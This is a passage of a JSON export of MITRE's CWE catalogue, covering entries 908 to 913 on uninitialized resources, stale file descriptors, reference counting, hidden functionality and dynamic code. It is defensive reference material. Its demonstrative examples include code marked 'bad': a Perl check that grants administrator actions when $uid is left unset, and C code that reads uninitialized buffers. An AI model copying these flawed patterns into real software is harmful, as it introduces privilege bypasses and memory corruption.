Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"908":{"attr":{"@_ID":"908","@_Name":"Use of Uninitialized Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses or accesses a resource that has not been initialized.","Extended_Description":"When a resource has not been properly initialized, the software may behave unexpectedly. This may lead to a crash or invalid memory access, but the consequences vary depending on the type of resource and how it is used within the software.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"],"Note":"When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The uninitialized resource may contain values that cause program flow to change in ways that the programmer did not intend."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Explicitly initialize the resource before use. If this is performed through an API function or standard procedure, follow all required steps."},{"Phase":"Implementation","Description":"Pay close attention to complex conditionals that affect initialization, since some branches might not perform the initialization."},{"Phase":"Implementation","Description":"Avoid race conditions (CWE-362) during initialization routines."},{"Phase":"Build and Compilation","Description":"Run or compile the software with settings that generate warnings about uninitialized variables or data."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-105"},"Intro_Text":"Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private boolean initialized = true;public void someMethod() {","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (!initialized) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...initialized = true;","xhtml:br":["","","",""],"xhtml:i":"// perform initialization tasks"}}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."},{"attr":{"@_Demonstrative_Example_ID":"DX-106"},"Intro_Text":"The following code intends to concatenate a string to a variable and print the string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char str[20];strcat(str, \\"hello world\\");printf(\\"%s\\", str);","xhtml:br":["",""]}},"Body_Text":["This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory.","If a null terminator is found before str[8], then some bytes of random garbage will be printed before the \\"hello world\\" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found.","If a null terminator isn\'t found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn\'t found before the end of the memory segment is reached, leading to a segmentation fault and crash."]},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t  unknown condition when i is the same value as err_val,\\n\\t\\t\\t  because test_string is not initialized\\n\\t\\t\\t  (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t  (e.g. within a function body), test_string might be\\n\\t\\t\\t  random if it is stored on the heap or stack. If the\\n\\t\\t\\t  variable is declared in static memory, it might be zero\\n\\t\\t\\t  or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t  unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n              test_string might be an unexpected address, so the\\n              printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t  making sure that test_string has been properly set once\\n\\t\\t\\t  it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t  acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t  branch of the conditional - including the default/else\\n\\t\\t\\t  branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-9805","Description":"Chain: Creation of the packet client occurs before initialization is complete (CWE-696) resulting in a read from uninitialized memory (CWE-908), causing memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9805"},{"Reference":"CVE-2008-4197","Description":"Use of uninitialized memory may allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4197"},{"Reference":"CVE-2008-2934","Description":"Free of an uninitialized pointer leads to crash and possible code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934"},{"Reference":"CVE-2008-0063","Description":"Product does not clear memory contents when generating an error message, leading to information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063"},{"Reference":"CVE-2008-0062","Description":"Lack of initialization triggers NULL pointer dereference or double-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2008-0081","Description":"Uninitialized variable leads to code execution in popular desktop application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081"},{"Reference":"CVE-2008-3688","Description":"Chain: Uninitialized variable leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"},{"Reference":"CVE-2008-3475","Description":"Chain: Improper initialization leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3475"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"},{"Reference":"CVE-2008-3597","Description":"Chain: game server can access player data structures before initialization has happened leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597"},{"Reference":"CVE-2009-2692","Description":"Chain: uninitialized function pointers can be dereferenced allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-0949","Description":"Chain: improper initialization of memory can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949"},{"Reference":"CVE-2009-3620","Description":"Chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP33-C","Entry_Name":"Do not read uninitialized memory","Mapping_Fit":"CWE More Abstract"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-436"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21","Submission_Comment":"New weakness based on discussion on the CWE research list in December 2012."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}]}},"909":{"attr":{"@_ID":"909","@_Name":"Missing Initialization of Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not initialize a critical resource.","Extended_Description":"Many resources require initialization before they can be properly used. If a resource is not initialized, it could contain unpredictable or expired data, or it could be initialized to defaults that are invalid. This can have security implications when the resource is expected to have certain properties or values.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"908","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"],"Note":"When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The uninitialized resource may contain values that cause program flow to change in ways that the programmer did not intend."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Explicitly initialize the resource before use. If this is performed through an API function or standard procedure, follow all specified steps."},{"Phase":"Implementation","Description":"Pay close attention to complex conditionals that affect initialization, since some branches might not perform the initialization."},{"Phase":"Implementation","Description":"Avoid race conditions (CWE-362) during initialization routines."},{"Phase":"Build and Compilation","Description":"Run or compile your software with settings that generate warnings about uninitialized variables or data."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-105"},"Intro_Text":"Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private boolean initialized = true;public void someMethod() {","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (!initialized) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...initialized = true;","xhtml:br":["","","",""],"xhtml:i":"// perform initialization tasks"}}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."},{"Intro_Text":"The following code intends to concatenate a string to a variable and print the string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char str[20];strcat(str, \\"hello world\\");printf(\\"%s\\", str);","xhtml:br":["",""]}},"Body_Text":["This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory.","If a null terminator is found before str[8], then some bytes of random garbage will be printed before the \\"hello world\\" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found.","If a null terminator isn\'t found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn\'t found before the end of the memory segment is reached, leading to a segmentation fault and crash."]},{"attr":{"@_Demonstrative_Example_ID":"DX-144"},"Intro_Text":"This example will leave test_string in an\\n\\t\\t\\t  unknown condition when i is the same value as err_val,\\n\\t\\t\\t  because test_string is not initialized\\n\\t\\t\\t  (CWE-456). Depending on where this code segment appears\\n\\t\\t\\t  (e.g. within a function body), test_string might be\\n\\t\\t\\t  random if it is stored on the heap or stack. If the\\n\\t\\t\\t  variable is declared in static memory, it might be zero\\n\\t\\t\\t  or NULL. Compiler optimization might contribute to the\\n\\t\\t\\t  unpredictability of this address.","Example_Code":[{"#text":"char *test_string;if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string = \\"Done at the beginning\\";if (i != err_val){}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"char *test_string;if (i != err_val){}else {}printf(\\"%s\\", test_string);","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"test_string = \\"Hello World!\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"test_string = \\"Done on the other side!\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":[{"xhtml:p":["When the printf() is reached,\\n              test_string might be an unexpected address, so the\\n              printf might print junk strings (CWE-457).","To fix this code, there are a couple approaches to\\n\\t\\t\\t  making sure that test_string has been properly set once\\n\\t\\t\\t  it reaches the printf().","One solution would be to set test_string to an\\n\\t\\t\\t  acceptable default before the conditional:"]},"Another solution is to ensure that each\\n\\t\\t\\t  branch of the conditional - including the default/else\\n\\t\\t\\t  branch - could ensure that test_string is set:"]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-20739","Description":"A variable that has its value set in a conditional statement is sometimes used when the conditional fails, sometimes causing data leakage","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20739"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21","Submission_Comment":"New weakness based on discussion on the CWE research list in December 2012."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}]}},"910":{"attr":{"@_ID":"910","@_Name":"Use of Expired File Descriptor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses or accesses a file descriptor after it has been closed.","Extended_Description":"After a file descriptor for a particular file or device has been released, it can be reused. The code might not write to the original file, since the reused file descriptor might reference a different file or device.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Stale file descriptor"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The program could read data from the wrong file."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Accessing a file descriptor that has been closed can cause a crash."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"Exact"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21","Submission_Comment":"New weakness based on discussion on the CWE research list in December 2012."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"911":{"attr":{"@_ID":"911","@_Name":"Improper Update of Reference Count","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a reference count to manage a resource, but it does not update or incorrectly updates the reference count.","Extended_Description":"Reference counts can be used when tracking how many objects contain a reference to a particular resource, such as in memory management or garbage collection. When the reference count reaches zero, the resource can be de-allocated or reused because there are no more objects that use it. If the reference count accidentally reaches zero, then the resource might be released too soon, even though it is still in use. If all objects no longer use the resource, but the reference count is not zero, then the resource might not ever be released.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"672","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"772","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0574","Description":"chain: reference count is not decremented, leading to memory leak in OS by sending ICMP packets.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0574"},{"Reference":"CVE-2004-0114","Description":"Reference count for shared memory not decremented when a function fails, potentially allowing unprivileged users to read kernel memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0114"},{"Reference":"CVE-2006-3741","Description":"chain: improper reference count tracking leads to file descriptor consumption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3741"},{"Reference":"CVE-2007-1383","Description":"chain: integer overflow in reference counter causes the same variable to be destroyed twice.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1383"},{"Reference":"CVE-2007-1700","Description":"Incorrect reference count calculation leads to improper object destruction and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1700"},{"Reference":"CVE-2008-2136","Description":"chain: incorrect update of reference count leads to memory leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2136"},{"Reference":"CVE-2008-2785","Description":"chain/composite: use of incorrect data type for a reference counter allows an overflow of the counter, leading to a free of memory that is still in use.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2785"},{"Reference":"CVE-2008-5410","Description":"Improper reference counting leads to failure of cryptographic operations.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5410"},{"Reference":"CVE-2009-1709","Description":"chain: improper reference counting in a garbage collection routine leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1709"},{"Reference":"CVE-2009-3553","Description":"chain: reference count not correctly maintained when client disconnects during a large operation, leading to a use-after-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3553"},{"Reference":"CVE-2009-3624","Description":"Reference count not always incremented, leading to crash or code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3624"},{"Reference":"CVE-2010-0176","Description":"improper reference counting leads to expired pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0176"},{"Reference":"CVE-2010-0623","Description":"OS kernel increments reference count twice but only decrements once, leading to resource consumption and crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0623"},{"Reference":"CVE-2010-2549","Description":"OS kernel driver allows code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2549"},{"Reference":"CVE-2010-4593","Description":"improper reference counting leads to exhaustion of IP addresses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4593"},{"Reference":"CVE-2011-0695","Description":"Race condition causes reference counter to be decremented prematurely, leading to the destruction of still-active object and an invalid pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695"},{"Reference":"CVE-2012-4787","Description":"improper reference counting leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4787"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-884"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}]}},"912":{"attr":{"@_ID":"912","@_Name":"Hidden Functionality","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains functionality that is not documented, not part of the specification, and not accessible through an interface or command sequence that is obvious to the software\'s users or administrators.","Extended_Description":"Hidden functionality can take many forms, such as intentionally malicious code, \\"Easter Eggs\\" that contain extraneous functionality such as games, developer-friendly shortcuts that reduce maintenance or support costs such as hard-coded accounts, etc. From a security perspective, even when the functionality is not intentionally malicious or damaging, it can increase the software\'s attack surface and expose additional weaknesses beyond what is already exposed by the intended functionality. Even if it is not easily accessible, the hidden functionality could be useful for attacks that modify the control flow of the application.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."},{"Phase":"Testing","Description":"Conduct a code coverage analysis using live testing, then closely inspect any code that is not covered."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"133"}},{"attr":{"@_CAPEC_ID":"190"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2012-12-28"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"913":{"attr":{"@_ID":"913","@_Name":"Improper Control of Dynamically-Managed Code Resources","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.","Extended_Description":"Many languages offer powerful features that allow the programmer to dynamically create or modify existing code, or resources used by code such as variables and objects. While these features can offer significant flexibility and reduce development time, they can be extremely dangerous if attackers can directly influence these code resources in unexpected ways.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Execute Unauthorized Code or Commands"},{"Scope":["Other","Integrity"],"Impact":["Varies by Context","Alter Execution Logic"]}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"For any externally-influenced input, check the input against an allowlist of acceptable values."},{"Phase":["Implementation","Architecture and Design"],"Strategy":"Refactoring","Description":"Refactor the code so that it does not need to be dynamically managed."}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2013-01-26"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"914":{"attr":{"@_ID":"914","@_Name":"Improper Control of Dynamically-Identified 